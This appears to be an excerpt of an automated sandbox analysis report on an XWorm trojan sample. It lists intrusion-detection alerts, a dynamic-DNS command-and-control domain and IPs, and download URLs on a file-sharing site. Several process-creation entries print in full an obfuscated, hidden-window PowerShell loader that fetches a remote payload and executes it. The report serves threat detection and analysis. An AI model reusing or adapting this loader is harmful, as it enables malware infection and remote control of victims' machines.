              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior

              Networking

              barindex
              Snort IDS alert for network traffic
              Source: TrafficSnort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 12.202.180.134:8896 -> 192.168.2.6:49724
              Source: TrafficSnort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 12.202.180.134:8896 -> 192.168.2.6:49724
              Source: TrafficSnort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.6:49724 -> 12.202.180.134:8896
              Source: TrafficSnort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.6:49724 -> 12.202.180.134:8896
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: tbsagyw.duckdns.org
              Uses dynamic DNS services
              Source: unknownDNS query: name: tbsagyw.duckdns.org
              Source: global trafficTCP traffic: 192.168.2.6:49724 -> 12.202.180.134:8896
              Source: Joe Sandbox ViewIP Address: 69.31.136.17 69.31.136.17
              Source: Joe Sandbox ViewIP Address: 12.202.180.134 12.202.180.134
              Source: Joe Sandbox ViewIP Address: 104.21.28.80 104.21.28.80
              Source: Joe Sandbox ViewASN Name: FISERV-INCUS FISERV-INCUS
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: global trafficHTTP traffic detected: GET /pro/dl/jj4uw4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /dlpro/2322c2dd21531059d1754f0174582ff2/664f950e/jj4uw4/Polyfon.csv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs03n4.sendspace.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /pro/dl/ug8lu5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /dlpro/47629cb82a703442a77abc2aaf0e4ed6/664f9537/ug8lu5/EwcTRqORRXkTdykugKGXjGVoR103.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs03n1.sendspace.comConnection: Keep-AliveCookie: SID=o97eha0u97md48nbbdbvhl8653
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /pro/dl/jj4uw4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /dlpro/2322c2dd21531059d1754f0174582ff2/664f950e/jj4uw4/Polyfon.csv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs03n4.sendspace.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /pro/dl/ug8lu5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /dlpro/47629cb82a703442a77abc2aaf0e4ed6/664f9537/ug8lu5/EwcTRqORRXkTdykugKGXjGVoR103.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs03n1.sendspace.comConnection: Keep-AliveCookie: SID=o97eha0u97md48nbbdbvhl8653
              Source: global trafficDNS traffic detected: DNS query: www.sendspace.com
              Source: global trafficDNS traffic detected: DNS query: fs03n4.sendspace.com
              Source: global trafficDNS traffic detected: DNS query: fs03n1.sendspace.com
              Source: global trafficDNS traffic detected: DNS query: tbsagyw.duckdns.org
              Source: powershell.exe, 00000003.00000002.2727560719.0000024C5956B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fs03n4.sendspace.com
              Source: powershell.exe, 00000003.00000002.2834421548.0000024C677EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2609130468.00000000054F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000006.00000002.2592434274.00000000045ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000003.00000002.2727560719.0000024C57781000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2592434274.0000000004491000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000C.00000002.3376138960.0000000023191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000006.00000002.2592434274.00000000045ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000003.00000002.2727560719.0000024C59533000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sendspace.com
              Source: powershell.exe, 00000003.00000002.2727560719.0000024C57781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000006.00000002.2592434274.0000000004491000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000006.00000002.2609130468.00000000054F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000006.00000002.2609130468.00000000054F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000006.00000002.2609130468.00000000054F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: wab.exe, 0000000C.00000003.2578081685.00000000077C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs03n1.sendspace.com/
              Source: wab.exe, 0000000C.00000002.3362816569.00000000077B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs03n1.sendspace.com/dlpro/47629cb82a703442a77abc2aaf0e4ed6/664f9537/ug8lu5/EwcTRqORRXkTdyku
              Source: wab.exe, 0000000C.00000003.2588389826.00000000077BA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.2588420928.00000000077C5000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000002.3362816569.00000000077B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs03n1.sendspace.com/v
              Source: wab.exe, 0000000C.00000003.2578081685.00000000077C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.2588389826.00000000077BA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.2588420928.00000000077C5000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000002.3362816569.00000000077B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs03n1.sendspace.com/y
              Source: powershell.exe, 00000003.00000002.2727560719.0000024C59558000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fs03n4.sendspaX
              Source: powershell.exe, 00000003.00000002.2727560719.0000024C57C15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2727560719.0000024C59558000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fs03n4.sendspace.com
              Source: powershell.exe, 00000003.00000002.2727560719.0000024C59554000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2727560719.0000024C57C11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2727560719.0000024C57C15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2727560719.0000024C59533000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2727560719.0000024C59558000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fs03n4.sendspace.com/dlpro/2322c2dd21531059d1754f0174582ff2/664f950e/jj4uw4/Polyfon.csv
              Source: powershell.exe, 00000006.00000002.2592434274.00000000045ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000003.00000002.2727560719.0000024C58BE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000003.00000002.2834421548.0000024C677EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2609130468.00000000054F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000003.00000002.2727560719.0000024C579AD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2727560719.0000024C5906B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com
              Source: wab.exe, 0000000C.00000002.3362816569.0000000007758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/
              Source: wab.exe, 0000000C.00000002.3362816569.0000000007758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/%I8V
              Source: powershell.exe, 00000003.00000002.2727560719.0000024C579AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/jj4uw4P
              Source: powershell.exe, 00000006.00000002.2592434274.00000000045ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/jj4uw4XR
              Source: wab.exe, 0000000C.00000003.2578081685.00000000077C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000002.3374313577.0000000022840000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/ug8lu5
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownHTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.6:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.6:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.6:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.6:49721 version: TLS 1.2

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: amsi32_5144.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 5092, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 5144, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Very long command line found
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6216
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6240
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6216Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6240Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD3466B8C23_2_00007FFD3466B8C2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD3466AB163_2_00007FFD3466AB16
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0443E9286_2_0443E928
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0443F1F86_2_0443F1F8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0443E5E06_2_0443E5E0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0273712A12_2_0273712A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0273D50412_2_0273D504
              Source: amsi32_5144.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 5092, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 5144, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.evad.winCMD@13/9@4/3
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Innumerable.SnoJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1396:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5328:120:WilError_03
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\MFUu6tulv9qAMMHj
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yhdutsjh.vxt.ps1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5092
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5144
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\zap.cmd" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Sulphuric = 1;$Plethorous='Sub';$Plethorous+='strin';$Plethorous+='g';Function hdrede($Blaastakkens){$Preflood=$Blaastakkens.Length-$Sulphuric;For($fstningsvrkers=5;$fstningsvrkers -lt $Preflood;$fstningsvrkers+=6){$Handelsstandsforenings251+=$Blaastakkens.$Plethorous.Invoke( $fstningsvrkers, $Sulphuric);}$Handelsstandsforenings251;}function Smrkers($Scooch){& ($Traguloidea) ($Scooch);}$Stikprop=hdrede 'HjlpeMNvninoKlip zBrothi Uds lDagsbl f,rmaKb.va/Nices5Woodb.Monas0 R.fl Ac.om(pladeWSuffoi Annon,loofddum,eo Arbew KilosCarpo ronNFemi TKingp Kloak1Lfted0Misst.Monop0Danto;Ste i Alg,rWO lsniLyksanMedio6Skatt4Anlgs;Unomn Overhx Prer6 Varm4Nivea; Pi,d Pol trDegrevPhth,:Overj1brai.2 Avar1.ands.Friti0Bedr.) Hore SkraaG TutmeSingacReseikG.ammoMrk s/F.gtf2T.len0Zenuw1Smmom0Pra.k0 ,ons1gldel0 etur1Sw pl VirgiFMateriTraa,r.rikteSk lafTitraoEriocx pre./No,il1Dilet2Tjrek1.esgs.L,sin0 Wool ';$Tudkoppernes=hdrede 'MoneyUFranksPrecieDa omrBanal- MajoA Lactg InapeUndern ignt eca ';$Loddendes=hdrede 'bela,hSambetBackhtSpattpFornusFarve: Exed/Agerj/Untanwhemi,wAntemw dapi.Preles,omiteFo,brnScrold AswisSin,lpModbyaS,mbicF ytteMod.v. Didecthu,do RivamSt,tu/Soldap dybhrhemogo rbe/UnchrdGkkerl De,t/Preafj.ostbjThrif4StinkuTauriw A,st4 Dyre ';$Gainyield=hdrede 'Pino,> orma ';$Traguloidea=hdrede ' LeeuiPhiloeCotylxBront ';$Sogneprst='Khediviah';$Indlaes = hdrede ' Ar.eeU derc Parahdir yo Ekss Geogl% Frdia LovtpDisorpFremtdSynf,a Uropt Kn.sa iara% I dp\te,esI MohanFolk.nFarmeuSensimNeur,eTrster NazaaSemi b BarnlMutone Swee.T,oppS AandnMacr.oFanta ,nder&Im.od&B adm UrosteFr,ntcAcleihA.gosoElvte SerietSe in ';Smrkers (hdrede 'Histo$Whispg Taknl Unr,o UntrbForbra WorklAbsal: MicrBGasrroDentagBi.enlRgerlr FortdEsslie PerssSatch=D.gdr(SylfecBaha,mSkambdTwadd ele/Aft,ec ,ugh Mis,m$SerosI UntenEntomdTrforlTendeadeporeDiktasSnupp)spoer ');Smrkers (hdrede ' Valu$daimigNonr l.egago,entebFe.icaMo ndlsvvef:ForveSOv rto StndmPrdikmSiwase offlrBl sdfNiveauMislagBaronlG.evdeAnatemN.ghto.ugledVenlieG wkilPopullZy,odekmninr,kabesFin.a=Forst$N.triLTagaso Bio.d Eos.dAg iceTransn.ankidO gaveOutw sFanga.ItalisDirtbpMelitlEderniforlst Subs(Amatr$SulfoGBrndsa OrgaiPet onUnlabySelvbiMa.iseMayollAlpetd Dagd) Ener ');$Loddendes=$Sommerfuglemodellers[0];$Lngerevarig= (hdrede 'Ironi$AfstegAnlgklOutseoDadleb IsotaindfalMaste:.krueP TrkkyDelberForniasjoven.noffoOver,iKataldBipro= Sug N MinueTilenwFilib- Ank,OUnmanb AclujbogleeFld,sc Reg,t Deba PresoSBelemyS grnsSkifttMagneeLegitm Udby.h.artNProfie Moustoutbo. Pa,tWFragme Skrib BertCRitualHoggii aurseDis,enSublit');$Lngerevarig+=$Boglrdes[1];Smrkers ($Lngerevarig);Smrkers (hdrede 'bomol$SansaPF.rveySt,derAnsteaPeriknFejlno.lempiConcadBalle.TilbyH Lo ieCorroa SpildRampiebrisarudspesFremt[ utte$SnkelTBa,keuKynu.dS ramkHelleo SignpPerspp LacteBasbarB whon Re,oeDepetsOrigi]Ha,rs=.rese$TandgSMachetCladoiA.stekSkribpEkster Virko Barnp G ne ');$Emplanes=
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Innumerable.Sno && echo t"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Sulphuric = 1;$Plethorous='Sub';$Plethorous+='strin';$Plethorous+='g';Function hdrede($Blaastakkens){$Preflood=$Blaastakkens.Length-$Sulphuric;For($fstningsvrkers=5;$fstningsvrkers -lt $Preflood;$fstningsvrkers+=6){$Handelsstandsforenings251+=$Blaastakkens.$Plethorous.Invoke( $fstningsvrkers, $Sulphuric);}$Handelsstandsforenings251;}function Smrkers($Scooch){& ($Traguloidea) ($Scooch);}$Stikprop=hdrede 'HjlpeMNvninoKlip zBrothi Uds lDagsbl f,rmaKb.va/Nices5Woodb.Monas0 R.fl Ac.om(pladeWSuffoi Annon,loofddum,eo Arbew KilosCarpo ronNFemi TKingp Kloak1Lfted0Misst.Monop0Danto;Ste i Alg,rWO lsniLyksanMedio6Skatt4Anlgs;Unomn Overhx Prer6 Varm4Nivea; Pi,d Pol trDegrevPhth,:Overj1brai.2 Avar1.ands.Friti0Bedr.) Hore SkraaG TutmeSingacReseikG.ammoMrk s/F.gtf2T.len0Zenuw1Smmom0Pra.k0 ,ons1gldel0 etur1Sw pl VirgiFMateriTraa,r.rikteSk lafTitraoEriocx pre./No,il1Dilet2Tjrek1.esgs.L,sin0 Wool ';$Tudkoppernes=hdrede 'MoneyUFranksPrecieDa omrBanal- MajoA Lactg InapeUndern ignt eca ';$Loddendes=hdrede 'bela,hSambetBackhtSpattpFornusFarve: Exed/Agerj/Untanwhemi,wAntemw dapi.Preles,omiteFo,brnScrold AswisSin,lpModbyaS,mbicF ytteMod.v. Didecthu,do RivamSt,tu/Soldap dybhrhemogo rbe/UnchrdGkkerl De,t/Preafj.ostbjThrif4StinkuTauriw A,st4 Dyre ';$Gainyield=hdrede 'Pino,> orma ';$Traguloidea=hdrede ' LeeuiPhiloeCotylxBront ';$Sogneprst='Khediviah';$Indlaes = hdrede ' Ar.eeU derc Parahdir yo Ekss Geogl% Frdia LovtpDisorpFremtdSynf,a Uropt Kn.sa iara% I dp\te,esI MohanFolk.nFarmeuSensimNeur,eTrster NazaaSemi b BarnlMutone Swee.T,oppS AandnMacr.oFanta ,nder&Im.od&B adm UrosteFr,ntcAcleihA.gosoElvte SerietSe in ';Smrkers (hdrede 'Histo$Whispg Taknl Unr,o UntrbForbra WorklAbsal: MicrBGasrroDentagBi.enlRgerlr FortdEsslie PerssSatch=D.gdr(SylfecBaha,mSkambdTwadd ele/Aft,ec ,ugh Mis,m$SerosI UntenEntomdTrforlTendeadeporeDiktasSnupp)spoer ');Smrkers (hdrede ' Valu$daimigNonr l.egago,entebFe.icaMo ndlsvvef:ForveSOv rto StndmPrdikmSiwase offlrBl sdfNiveauMislagBaronlG.evdeAnatemN.ghto.ugledVenlieG wkilPopullZy,odekmninr,kabesFin.a=Forst$N.triLTagaso Bio.d Eos.dAg iceTransn.ankidO gaveOutw sFanga.ItalisDirtbpMelitlEderniforlst Subs(Amatr$SulfoGBrndsa OrgaiPet onUnlabySelvbiMa.iseMayollAlpetd Dagd) Ener ');$Loddendes=$Sommerfuglemodellers[0];$Lngerevarig= (hdrede 'Ironi$AfstegAnlgklOutseoDadleb IsotaindfalMaste:.krueP TrkkyDelberForniasjoven.noffoOver,iKataldBipro= Sug N MinueTilenwFilib- Ank,OUnmanb AclujbogleeFld,sc Reg,t Deba PresoSBelemyS grnsSkifttMagneeLegitm Udby.h.artNProfie Moustoutbo. Pa,tWFragme Skrib BertCRitualHoggii aurseDis,enSublit');$Lngerevarig+=$Boglrdes[1];Smrkers ($Lngerevarig);Smrkers (hdrede 'bomol$SansaPF.rveySt,derAnsteaPeriknFejlno.lempiConcadBalle.TilbyH Lo ieCorroa SpildRampiebrisarudspesFremt[ utte$SnkelTBa,keuKynu.dS ramkHelleo SignpPerspp LacteBasbarB whon Re,oeDepetsOrigi]Ha,rs=.rese$TandgSMachetCladoiA.stekSkribpEkster Virko
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Innumerable.Sno && echo t"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Sulphuric = 1;$Plethorous='Sub';$Plethorous+='strin';$Plethorous+='g';Function hdrede($Blaastakkens){$Preflood=$Blaastakkens.Length-$Sulphuric;For($fstningsvrkers=5;$fstningsvrkers -lt $Preflood;$fstningsvrkers+=6){$Handelsstandsforenings251+=$Blaastakkens.$Plethorous.Invoke( $fstningsvrkers, $Sulphuric);}$Handelsstandsforenings251;}function Smrkers($Scooch){& ($Traguloidea) ($Scooch);}$Stikprop=hdrede 'HjlpeMNvninoKlip zBrothi Uds lDagsbl f,rmaKb.va/Nices5Woodb.Monas0 R.fl Ac.om(pladeWSuffoi Annon,loofddum,eo Arbew KilosCarpo ronNFemi TKingp Kloak1Lfted0Misst.Monop0Danto;Ste i Alg,rWO lsniLyksanMedio6Skatt4Anlgs;Unomn Overhx Prer6 Varm4Nivea; Pi,d Pol trDegrevPhth,:Overj1brai.2 Avar1.ands.Friti0Bedr.) Hore SkraaG TutmeSingacReseikG.ammoMrk s/F.gtf2T.len0Zenuw1Smmom0Pra.k0 ,ons1gldel0 etur1Sw pl VirgiFMateriTraa,r.rikteSk lafTitraoEriocx pre./No,il1Dilet2Tjrek1.esgs.L,sin0 Wool ';$Tudkoppernes=hdrede 'MoneyUFranksPrecieDa omrBanal- MajoA Lactg InapeUndern ignt eca ';$Loddendes=hdrede 'bela,hSambetBackhtSpattpFornusFarve: Exed/Agerj/Untanwhemi,wAntemw dapi.Preles,omiteFo,brnScrold AswisSin,lpModbyaS,mbicF ytteMod.v. Didecthu,do RivamSt,tu/Soldap dybhrhemogo rbe/UnchrdGkkerl De,t/Preafj.ostbjThrif4StinkuTauriw A,st4 Dyre ';$Gainyield=hdrede 'Pino,> orma ';$Traguloidea=hdrede ' LeeuiPhiloeCotylxBront ';$Sogneprst='Khediviah';$Indlaes = hdrede ' Ar.eeU derc Parahdir yo Ekss Geogl% Frdia LovtpDisorpFremtdSynf,a Uropt Kn.sa iara% I dp\te,esI MohanFolk.nFarmeuSensimNeur,eTrster NazaaSemi b BarnlMutone Swee.T,oppS AandnMacr.oFanta ,nder&Im.od&B adm UrosteFr,ntcAcleihA.gosoElvte SerietSe in ';Smrkers (hdrede 'Histo$Whispg Taknl Unr,o UntrbForbra WorklAbsal: MicrBGasrroDentagBi.enlRgerlr FortdEsslie PerssSatch=D.gdr(SylfecBaha,mSkambdTwadd ele/Aft,ec ,ugh Mis,m$SerosI UntenEntomdTrforlTendeadeporeDiktasSnupp)spoer ');Smrkers (hdrede ' Valu$daimigNonr l.egago,entebFe.icaMo ndlsvvef:ForveSOv rto StndmPrdikmSiwase offlrBl sdfNiveauMislagBaronlG.evdeAnatemN.ghto.ugledVenlieG wkilPopullZy,odekmninr,kabesFin.a=Forst$N.triLTagaso Bio.d Eos.dAg iceTransn.ankidO gaveOutw sFanga.ItalisDirtbpMelitlEderniforlst Subs(Amatr$SulfoGBrndsa OrgaiPet onUnlabySelvbiMa.iseMayollAlpetd Dagd) Ener ');$Loddendes=$Sommerfuglemodellers[0];$Lngerevarig= (hdrede 'Ironi$AfstegAnlgklOutseoDadleb IsotaindfalMaste:.krueP TrkkyDelberForniasjoven.noffoOver,iKataldBipro= Sug N MinueTilenwFilib- Ank,OUnmanb AclujbogleeFld,sc Reg,t Deba PresoSBelemyS grnsSkifttMagneeLegitm Udby.h.artNProfie Moustoutbo. Pa,tWFragme Skrib BertCRitualHoggii aurseDis,enSublit');$Lngerevarig+=$Boglrdes[1];Smrkers ($Lngerevarig);Smrkers (hdrede 'bomol$SansaPF.rveySt,derAnsteaPeriknFejlno.lempiConcadBalle.TilbyH Lo ieCorroa SpildRampiebrisarudspesFremt[ utte$SnkelTBa,keuKynu.dS ramkHelleo SignpPerspp LacteBasbarB whon Re,oeDepetsOrigi]Ha,rs=.rese$TandgSMachetCladoiA.stekSkribpEkster Virko Barnp G ne ');$Emplanes=Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Innumerable.Sno && echo t"Jump to behavior
